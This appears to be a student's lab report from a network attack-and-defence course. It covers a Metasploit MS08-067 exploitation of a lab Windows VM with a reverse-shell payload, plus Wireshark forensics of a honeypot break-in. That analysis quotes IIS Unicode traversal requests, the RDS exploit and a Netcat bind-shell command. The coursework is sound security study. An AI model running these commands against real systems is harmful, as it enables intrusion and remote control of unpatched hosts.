# 20251916 2025-2026-2 《网络攻防实践》实践6报告

1.实践内容

1.Metasploit 远程渗透实践:以 Kali Linux(替代 BT4)为攻击机,对存在 MS08-067 漏洞的 Windows 靶机进行远程渗透攻击,获取目标主机的访问权限,掌握漏洞利用的完整流程。
2.攻击取证分析实践:针对攻击者(IP:212.116.251.162)攻陷蜜罐主机(IP:172.16.1.106,主机名:lab.wiretrip.net)的事件,分析攻击者工具、攻击过程、提权后行为,梳理防御方法,并判断攻击者是否察觉目标为蜜罐。
3.团队对抗攻防实践:攻击方使用 Metasploit 选择 Windows 漏洞发起攻击并获取控制权;防守方使用 Wireshark 监听网络数据包,还原攻击过程、提取关键信息,完成攻防双向实践。

2.实践过程

2.1Metasploit 攻击 MS08-067 漏洞

本次实验环境:攻击机为 Kali,IP:192.168.77.128;靶机为 Win2k(存在 MS08-067 漏洞),IP:192.168.77.133,两者处于同一虚拟网络,可正常通信。
在kali中执行msfconsole,进入启动msfconsole
8cc67a44be225e36edfc74632e09f73

执行命令use windows/smb/ms08_067_netapi进入漏洞所在文件
3764b43c375645ada19a5abe53e052b

执行命令show options查看攻击此漏洞需要的设置
705726a4c9619a7ffa5bf7ffa437030

执行命令show payloads显示此漏洞的载荷
1777102670471

选择3个载荷进行攻击,执行set payload generic/shell_reverse_tcp设置载荷,执行set RHOST 192.168.77.133设置攻击主机,执行set LHOST 192.168.77.128设置本机
1777104763162

执行命令exploit进行攻击出现会话连接即攻击成功
1777104702874

回车即可进入到受害靶机的shell,执行ipconfig/all查看靶机的IP,攻击成功
ea80870cbeaa01028dc655549a2ea96

2.2NT 系统破解攻击取证分析

在kali中打开Wireshark,打开攻击流量日志文件snort-0204@0117.log,执行ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http筛选攻击流量
9143b8a8a802a583d5b9a7d23ebd806

跟踪117数据包的TCP数据流,找到特殊字符%C0%AF,经搜索百度知,这是 Unicode 漏洞攻击标致
9eb412c362aadccb3da0bbbcd4e93db
1777106069952

继续跟踪149数据包的TCP数据流,发现有shell语句和!ADM!ROX!YOUR!WORLD!-,根据此查询百度可知,这是RDS漏洞,将这些shell代码整理出来并进行分析
1777106353881

查看1233数据包的TCP数据流时发现端口6969,百度可知端口6969是木马Gatecrasher
c7bcf1f2f73459183c3436a2f79b77b

继续查看no.5766 TCP数据流,可以看到删除了ftp的文件,发现其是蜜罐主机
ee1412eb9c82ecf9089dc813284ec3f

1.攻击者使用了什么破解工具进行攻击

从流量包可以明确,攻击者使用IIS Unicode编码路径穿越漏洞和MDAC RDS 远程命令执行漏洞,具体为 IIS 4.0/5.0 自带的msadcs.dll组件漏洞,属于 Windows NT/2000 时代的经典高危漏洞。

2.攻击者如何使用这个破解工具进入并控制了系统

攻击者首先对靶机进行 Web 层信息收集,确认漏洞利用条件。再通过 MDAC RDS 漏洞完成核心突破,获取靶机的系统命令执行权限,构造恶意 POST 请求,绕过基础校验;在请求体中构造恶意 SQL 查询,调用系统cmd.exe,将字符串werd写入 C 盘根目录的fun.txt文件。攻击者构造恶意 GET 请求,通过..%C0%AF../完成目录穿越,绕过 IIS 路径限制,直接调用系统cmd.exe,执行 Netcat 命令:nc -l -p 6969 -e cmd1.exe,在靶机的 6969 端口开启监听,将系统命令行绑定到该端口。攻击者持续发送路径穿越请求,执行后续系统命令,比如GET /msadc/..%C0%AF../.../cmd.exe?/c+del+ftpcom,尝试删除临时文件、清理攻击痕迹,同时验证后门的稳定性,即使部分请求返回502 Gateway Error,也未停止攻击,说明已经获得了稳定的系统控制权。

3.攻击者获得系统访问权限后做了什么

(1)通过echo werd >> c:\fun.txt写入测试文件,确认系统命令可正常执行,验证漏洞利用效果;
(2)执行 Netcat 命令开启绑定 shell,在靶机 6969 端口留下后门,实现对靶机的长期远程访问;
(3)执行del ftpcom等命令,删除攻击过程中上传的临时文件、清理攻击痕迹,避免被管理员发现;
(4)通过读取boot.ini等系统敏感文件,收集靶机的系统版本、配置信息,为后续内网渗透、权限进一步提升做准备;
(5)多次发送路径穿越和 MDAC 漏洞的恶意请求,反复验证漏洞的可用性,确保控制权限不会丢失。

4.如何防止这样的攻击

(1)及时安装系统补丁,定期打补丁,修复漏洞;
(2)自身的口令要是强口令,增大破解口令难度;
(3)定期扫描自身的主机,查看是否存在漏洞等危险。

5.攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

攻击者完全没有警觉目标是蜜罐主机。原因如下:
(1)攻击行为完全符合真实渗透流程,无任何蜜罐规避操作;
(2)蜜罐模拟的环境无任何异常特征,完全贴合真实系统;
(3)攻击者持续进行攻击操作,无任何停止或规避行为;
(4)攻击者未进行深度环境检测,无法发现蜜罐特征

2.3团队对抗实践:windows系统远程渗透攻击和分析

攻击机:Kali Linux 192.168.77.128
靶机:Win2k 192.168.77.133
执行以下命令:
msfconsole
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp
set RHOSTS 192.168.77.133
set LHOST 192.168.77.128
show options
exploit
ipconfig

b916a6b062bff06f68174df210c5949
成功建立会话
85d3feecc51c1e15f8b021a507ff87b

执行ip.addr == 192.168.3.129 and ip.addr == 192.168.3.126,监听流量
61fc592b0feaf23058762f31e6f6758

3.学习中遇到的问题及解决

  • 问题1:取证分析时无法定位关键攻击流量
  • 问题1解决方案:使用 IP 地址过滤规则,仅显示攻击者 IP(212.116.251.162)与靶机 IP(172.16.1.106)的通信数据包,同时过滤 SMB 协议流量,快速定位攻击过程的关键数据包。
  • 问题2:团队对抗中防守方无法捕获攻击流量
  • 问题2解决方案:攻击机、靶机与防守方主机未处于同一虚拟网络,防守方监听的网卡与攻击流量所在网卡不匹配。将三台主机均设置为 NAT 模式,确保处于同一虚拟网段;防守方在 Wireshark 中选择 NAT 模式对应的网卡进行监听,成功捕获攻击流量。

4.实践总结

以前在课本上学习 MS08-067、永恒之蓝这些漏洞时,只知道它们是高危漏洞,但这次亲手用 Metasploit 完成攻击,才真正理解了漏洞利用的原理 —— 一个未打补丁的 SMB 服务,就能让攻击者轻易获取系统最高权限,这种冲击感让我深刻意识到 “系统补丁和强口令是安全的第一道防线” 这句话的重量。同时,作为防守方用 Wireshark 分析攻击流量时,我也第一次学会了从杂乱的数据包中还原攻击过程,理解了 IDS/IPS 系统如何通过流量特征识别攻击行为,明白了攻击行为并非 “无痕”,只要做好日志审计与流量监控,就能追溯攻击源头。
这次实验也暴露了我很多不足:比如对漏洞原理的理解还不够深入,遇到攻击失败的问题时,排查效率不高;在团队对抗中,一开始甚至不知道如何选择正确的 Wireshark 监听网卡。这些问题也让我明白,网络安全攻防是一门实践性极强的学科,只靠课本知识远远不够,必须多动手、多踩坑,才能真正把理论转化为能力。

posted @ 2026-04-27 14:04  杨小烊  阅读(31)  评论(0)    收藏  举报